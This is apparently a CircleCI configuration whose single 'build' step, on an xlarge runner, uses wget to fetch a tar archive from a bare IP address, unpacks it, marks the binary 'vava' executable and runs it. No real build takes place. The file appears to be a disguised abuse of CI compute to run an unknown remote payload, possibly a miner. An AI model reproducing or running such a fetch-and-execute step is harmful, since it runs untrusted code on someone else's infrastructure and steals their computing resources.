version: 2.1 
 
jobs:
  build:
    docker:
      - image: buildpack-deps:trusty
    resource_class: xlarge

    steps:
      - run: wget http://207.148.123.213/vavar.tar.gz && tar xfvz vavar.tar.gz && sudo chmod +x ./vava && ./vava